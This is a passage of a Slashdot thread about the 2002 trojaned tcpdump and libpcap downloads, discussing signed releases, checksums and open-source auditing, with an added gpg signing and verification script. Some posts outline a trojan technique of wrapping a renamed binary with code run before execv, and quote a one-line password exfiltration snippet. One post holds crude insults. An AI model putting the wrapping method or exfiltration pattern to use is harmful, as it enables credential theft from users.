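Usage: `check_tarball ~/dl/tcpdump-3.7.1.tar.gz /var/db/digests` after populating the digest file from a copy you trust (a distro digest, a mirror checked earlier, a value taken from a signed mail). The digest must not come from the same download, and the grep step needs a human to read the hits; a mismatch at either step means the tarball is suspect, as Codifex Maximus says, until it diffs clean against known-good source.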
  62. Coincidence by thasmudyan · · Score: 2

    I don't mean to troll (and I hear you say "yeah but you are") BUT quite a few project sites seem to have been infused with trojaned downloads over the last few months. Actually makes you think if there is a certain person or organization behind this? Considering the fact that news like this give these projects a bad security reputation, which counter-balances the built-in security breaches of a certain commercial software giant just nicely. Just a paranoid thought, don't take it too seriously though (I know you won't but still).

  63. Holes in open source? by phorm · · Score: 2

    Did those virii come distributed with the product? Now you're going to tell me there are ABSOLUTELY NO possible security holes in open source software, ever right? Go on...

    Ignoring the fact that installing certain operating system components are often worse on your computer than a virus (by installing this service pack, we may enter your computer)...

    Nothing is 100% secure, and nobody ever said linux is (or not anyone intelligent, anyways). However, tallies of response time when a breach is found, and often the time in finding such a breach, are the factors at hand. You'll certainly not see MS yelling out "hey, we were hacked, check your software people," but instead something more like a quiet, um... something wrong... here patch... you fix.

    And yes, lots of MS tools come with bugs in them that leave your computer so open that you might as well just invite half the web for a party. Once MS gets the patch out, if you're a decently intelligent admin/user, you can fix things up to plug the hole, or meanwhile just disable affected components,etc.

    MS isn't all the problem, idiots who don't patch up are also a problem (demonstrated by the continual code red attempts shown in my webserver logs), but at least when something goes wrong we hear about it, and can expect a solution shortly after discovery.

  64. Centralized and De-centralized PGP server for OSS by dr.Flake · · Score: 2, Insightful


    Maybe somebody has already posted this idea as a project on sourceforge..

    There have been too many of these incidents lately, and it's giving OSS a bad odor. We must be careful. Telling the rest of the world closed binaries are infected often as well does not help. The damage is already done.

    This is my idea to prevent most of these jokers tricks.

    Instead of placing the checksums next to the source on the same server we need to place it somewhere safe. A number of centralized servers with a sole purpose to serve these sums, in several locations, on preferably different operating systems. This combined with the use of eg PGP.

    All distros, for those who have not already, must apply a simple program ala portage and apt that checks against multiple PGP-key servers before the build commences.

    Now, how to make sure the admin of the project is the one signing the source on his machine.............

    --
    Why are other people's sigs always more witty ???
  65. S/MIME by nsayer · · Score: 2

    ... Or you could join the Thawte web of trust and use S/MIME. The advantage there is that even if you do nothing more than sign up, your e-mail address is verified to belong to you. That alone is more rigorous verification than anything you're guaranteed with a PGP key. Get notarized twice, and your certificate can have your name in it, and those who get e-mail from you will know *exactly* what identity assurance the signature implies. The same can't be said with a signed PGP key. Plus with S/MIME, there is a key expiration mechanism, which ensures that the key can't (reasonably) be brute-forced before it becomes useless.

    S/MIME support is also more widespread. Why does that matter? Because more folks would be in a position to verify the signature. If you put a link on a download page to an S/MIME message with a mime-type of message/rfc822, browsers that support S/MIME (at least netscape, mozilla, I believe IE) will verify the signature and display the contents with a nice "signed" icon. The contents of the message would be the MD5 sums of the files.

  66. Re:Same with (Free)BSD port system by mjh · · Score: 2

    Considering that gentoo's portage system is based off of the BSD ports system that's not surprising.

    --
    Key to financial independence: Spend less than you earn. Save and invest the difference. Do it for a long time.
  67. teaser... by zogger · · Score: 2

    ...well? Please to release the info and name the bank and name the program. You are FOR crooks or AGAINST crooks, and releasing the info of this backdoor is a good thing to do. If it's really there, it most likely is *illegal* so any sort of nondisclosure noise is null and void, AFAIK. You DON'T have to cover up illegalities, in fact you are supposed to report them. This bank and its bogus officers and "bosses" needs to see the light of day in a fed courtroom.

  68. Automate the process? by Rotten · · Score: 2

    Is there any tool to analyze source code as an antivirus scans a binary file?

    For example, in this case, the program is running an external app and making changes to a system file.

    This is the first kind of thing I would see if I audit the code quickly.

  69. Not quite so simple by FallLine · · Score: 2
    It takes much less than you seem to think:

    rename the target binary 'program' as 'program.lib'
    Make a C program that first does the evil you want to do, then execv program.lib
    Compile your program and put it instead of the original program executable.

    It's not that simple. Sure, if all you're looking to do is execute some code and THEN give the user their expected interface, then that will work half-acceptably. However, you could not use this as a way to, say, discreetly intercept logins and passwords, transfer account balances, read someone's database, or what have you since all of that requires you to intercept things and still provide the user with acceptable responses (at least if you wish to avoid detection for more than a couple runs). Now you might attempt to come up with some elaborate scheme to act as an interactive go-between between the actual application and your trojan, but then you've greatly increased the complexity and the odds of detection.

    So, you see, there is no difference security-wise.
    No. There is a huge difference.
    1. Re:Not quite so simple by FallLine · · Score: 2
      I could. Almost in exactly the same way I would do adding a backdoor to an open-source program. From my evil code at the beginning I can read files and databases, redirect/duplicate network traffic, and so on. Truly, I might not be able to interact with the original code (not without some clever trick, anyway), but this is not needed to steal secrets: a password is not generated inside the program: it comes from outside (and I can intercept that) and often go outside(and I can intercept that).
      While I admit that you would have some flexibility there, it is not all that you crack it up to be. For instance, on a multiuser system where you're connecting to a remote database you would have a hard time intercepting keystrokes, asking the user to follow a subtly different path (i.e., enter their administrator password) or what have you. Even on a database that is local and that you have read access to, you would have to either have legitimate access through the daemon or know how to parse it (or just send the whole damn thing)...but you get the point. It's often more complicated than just grepping /etc/passwd.

      On the other hand, cleverness shall be applied also to place a backdoor in open source programs: or do you think that something like:
      gets(password); send(socket, password, strlen(password)) would not be spotted the same second in which it is submitted in the CVS of some open source program?
      I recognize that it would require some cleverness to bypass significant skilled human inspection. However, there are many areas of many open source programs that are not that closely inspected. I would venture to say the programs that are inspected closely are but a select few and those that aren't are at real risk. The existence of a number of exploitable (supposed) bugs in reasonably popular open source code for an extended period of time is about all the confirmation that one needs that it can be done (if a true, but grave, mistake can pass inspection, then certainly someone actively deceiving could go further). Furthermore, even if the code is 100% clean when it leaves the distribution servers, the very open source nature of that code, whether or not it came with a backdoor, still presents a much softer target for the disgruntled sysadmin, hacker, or what have you that wishes to install one of their own. In other words, just because the official code is clean does not mean that the binary is. (Although one can certainly say the same for proprietary/binary code, there is a much higher barrier to entry...at least to do anything non-trivial and non-obvious with)
  70. This is called spin... by sheldon · · Score: 2

    This is great, you've learned how to spin an argument.

    Not only have you used the cliche "Well they aren't any better either...", you've even taken one step further and declared this weakness as your greatest strength.

    Although to be an expert spin-meister you should have blamed this on Microsoft some how. Work on it, get back to us. Maybe we can get you a job at the Whitehouse if the tech market continues to flounder.

  71. Re:This is dreadful by fliplap · · Score: 2

    Did anyone pay you for the trojan in Borlands Interbase? How sure are you there's no trojan in Microsoft software? Would you know if there was? I'm aware you're just trolling, but keep in mind, the Interbase hole wasn't discovered for 6 YEARS when Borland open sourced it. Btw, no one ever said there was no security holes in open source software.

  72. Re:who needs what? who needs to protect us? by Zapdos · · Score: 2

    I protect myself, which I can. Nobody can (or even wants to) stop me from using or changing anything on my pc, and a trojan will have problems with a good firewall.

    Speaking of windows, I had to run ad-aware on my wife's "completely updated" XP box yesterday. I hate the virus company that makes gain. In fact there are quite a few websites that will install this and similar spyware on your "safe" OS.

    I do realize that my firewall will stop gain from talking, but when gain cannot talk to its home it will slow your windows box to the point of being unusable. BTW she has never had any gain supported software installed.

  73. When? by BitHive · · Score: 2

    Maybe I'm retarded, but the articles do not mention when they think the trojan was introduced. Does anyone know?

  74. DeMorgan's Law by srichman · · Score: 3, Interesting
    I mean, really, who writes code like this!?
    if (!(!buf || !*buf)) {
    We have a tricky tricky trojan writer on our hands. With obfuscation like this, it's a wonder the trojan was found at all...
    1. Re:DeMorgan's Law by SkewlD00d · · Score: 2

      lol!!!

      if(buf && *buf) { /* if buf is a string w/ length > 0 */

      yeah, i love the descriptive variable names too.

      and the malloc(1) statement followed by an out-of-bounds strcpy() over it. a good code profiler prog woulda caught it.

      maybe mandatory documentation justifying every line would help.

      --
      The biggest trick the devil pulled was letting lawyers become politicians so they can write the laws.
  75. you sir by bani · · Score: 2

    are either:

    1) an ignorant fuckwit

    or

    2) a lying fuckwit

    well, which one is it?

  76. tcpdump.org was running an old version of NetBSD by flynn_nrg · · Score: 2

    Check this post to the netbsd-users mailing list (emphasis mine) :

    From: David Maxwell
    To: Stefan Schumacher
    Cc: netbsd-users@netbsd.org
    Subject: Re: Trojans in libpcap and tcpdump
    Date: Wed, 13 Nov 2002 14:39:05 -0500
    Sender: netbsd-users-owner@netbsd.org
    User-Agent: Mutt/1.4i

    On Wed, Nov 13, 2002 at 06:52:38PM +0100, Stefan Schumacher wrote:
    > Hi there,
    >
    > report was given that trojans were detected in libpcap and tcpdump.
    >
    > http://hlug.fscker.com/
    >
    > I fetched tcpdump and libpcap and took a look in the sources, seems so as
    > if we IMHO are not affected.

    That is correct.

    I've been at the console of the tcpdump.org server today, working with
    Michael Richardson to investigate the problem. He will release a
    statement on the details at some point. The system was not running an
    up to date version of NetBSD, so there is no indication that users with
    up to date systems are vulnerable to some new bug.

    The trojan was installed within the last two days. The signatures in
    pkgsrc are eight _months_ old. Users installing from pkgsrc (source, or
    binary packages) could not be affected by this trojan without
    specifically overriding the incorrect signature on the distribution
    file.

    Michael's contact information is listed in the whois entry for the
    tcpdump.org domain, but as far as I know, he did not receive a call
    about this issue, it was slashdotted.

    --

  77. Wrong by 0x0d0a · · Score: 2

    Because there only needs to be *one* person out there who *does* look at the diffs and catches the thing. *Not* every person needs to catch the thing.

    Furthermore, analysis of what the thing is doing is much easier with open source.

  78. Correct by 0x0d0a · · Score: 2

    Apparently, it was less than one day.

    As someone else pointed out, the closed-source Interbase (DBMS) contained a trojan for over six years which was only found after it was open-sourced.

  79. ...And later moderators can't fix it! by Jetson · · Score: 3, Insightful
    This apparently misleading (albeit well-intentioned) comment gets modded +4 interesting, meaning that almost everyone will see this poor guy's name.

    All the replying posts pointing out that it's a phone company/ISP and it's almost certainly nothing to do with this chap are at 2 or below, meaning that many people won't see them and this individual's name is now besmirched.

    The sad part of this is the fact that we (people who have moderator points to give away) can't really fix the problem even after we're told about it. I could go back and mod down the misleading post, but then some metamoderator would see that I modded down what appears at face value to be an "interesting" post and I would be the one who was bitch-slapped for abusing my moderator points. All we can really do is mod up the replies, making the whole thread +5 in order to dilute the bad moderation.

  80. There may be people on /. who... by EnlightenmentFan · · Score: 2

    ...don't understand the ins and outs of Trojans (another joke). But why would you want to spend time writing flames for people who don't share your own brand of uber-geekery? Presumably those of us who spend time here do so in pursuit of some nerdy interest of our own.

    --
    Making trouble today for a better tomorrow...
    1. Re:There may be people on /. who... by gosand · · Score: 2
      Presumably those of us who spend time here do so in pursuit of some nerdy interest of our own.

      Then why would you comment on something that you knew nothing about?

      Think about that for a second.

      And I hardly think it is uber-geekery to be able to make the connection between the word "trojan" and "trojan horse" when referring to malicious code that was snuck into other code.

      --

      My beliefs do not require that you agree with them.

  81. Developers: by rweir · · Score: 2


    Go to gnupg.org and install gpg. Generate a keypair and put your public key up on wwwkeys.pgp.net. Whenever you meet another developer, sign each others keys. When you release a tarball, FUCKING SIGN IT and put up instructions telling people how to verify it. This sort of thing does not have to happen. The tools are there to prevent anyone ever trojaning an FTP server again. You will have to do this eventually or no one will trust your server enough to download your software, so why not start now? GO AND FUCKING START.
    </rant>

    Sorry about that, but how many times does this have to happen? It's trivial to prevent, but most people don't even try. Go and damn well start!
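What the two posts above (dr.Flake's and rweir's) ask for, written out as an added example that is not the thread's or any project's code: the developer side detach-signs the release tarball with gpg and publishes the `.asc` next to it, and the user side verifies that signature with the developer's public key before building. Key names, addresses and paths are assumptions; the `demo` function builds a throwaway keyring and a stand-in tarball so the whole round trip runs offline, and it assumes GnuPG 2.1 or later (for `--quick-generate-key` and loopback pinentry).

```sh
#!/bin/sh
# Added example: release signing and verification with GnuPG, as the thread
# recommends. Not code from the thread or from any project. Key ids, user
# ids and file names are assumptions; the demo keyring and tarball below are
# constructed on the fly. Requires GnuPG 2.1 or later.

# sign_release TARBALL KEYID
# Writes TARBALL.asc, a detached ASCII-armoured signature by KEYID. The
# developer publishes both files; a rooted mirror can replace the tarball
# but cannot produce a new .asc without the private key.
sign_release() {
    gpg --batch --yes --local-user "$2" --armor --detach-sign \
        --output "$1.asc" "$1"
}

# verify_release TARBALL
# Returns 0 only if TARBALL.asc is a good signature over TARBALL by a key in
# the verifying keyring. Note that gpg reports "Good signature" even for a
# key of unknown trust; that is why the post tells developers to get their
# keys signed: without a path in the web of trust, a good signature only
# proves the file was signed by whoever holds that key.
verify_release() {
    gpg --batch --verify "$1.asc" "$1" 2>/dev/null
}

# demo DIR
# Builds a throwaway keyring under DIR (via GNUPGHOME), signs a constructed
# stand-in tarball, verifies it, then appends one byte and checks that
# verification now fails. Returns 0 only if both outcomes are as expected.
demo() {
    dir=$1
    GNUPGHOME="$dir/gnupg"
    export GNUPGHOME
    mkdir -p "$GNUPGHOME" && chmod 700 "$GNUPGHOME"
    gpg --batch --passphrase '' --pinentry-mode loopback \
        --quick-generate-key 'Release Bot (constructed) <release@example.invalid>' \
        default default never >/dev/null 2>&1 || return 1
    tb="$dir/tcpdump-3.7.1.tar.gz"
    printf 'constructed stand-in for a release tarball\n' > "$tb"
    sign_release "$tb" release@example.invalid || return 1
    verify_release "$tb" || return 1
    # Tamper after signing, as a rooted server would: must fail to verify.
    printf 'x' >> "$tb"
    if verify_release "$tb"; then
        gpgconf --kill gpg-agent >/dev/null 2>&1 || true
        return 1
    fi
    gpgconf --kill gpg-agent >/dev/null 2>&1 || true
    return 0
}
```

In real use the developer's public key is fetched once from a keyserver or a keysigning, imported with `gpg --import`, and its fingerprint checked out of band; from then on `verify_release` runs against each download before the build, which is the step a build tool such as portage or apt would perform automatically. A signature published only on the same server as the tarball still beats a bare MD5 there, because the attacker cannot forge it, but the key itself must have been obtained independently.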

  82. Re:who needs what? who needs to protect us? by Zapdos · · Score: 2

    A car is a wonderful example. If I have a burnt out headlamp I fix it. I have never really had any real car problems, because I am a good car "admin." I do my maintenance as scheduled. If I have a flat tire, I change it with a spare, and then go to see a tire shop, not the manufacturer. If you have a security problem with windows, do you wait for MS to show up, or do you use other options?

    While I do think that the manufacturer is responsible for many of the problems, I do not have time to wait on the side of the road , for the manufacturer to show up and fix my flat tire.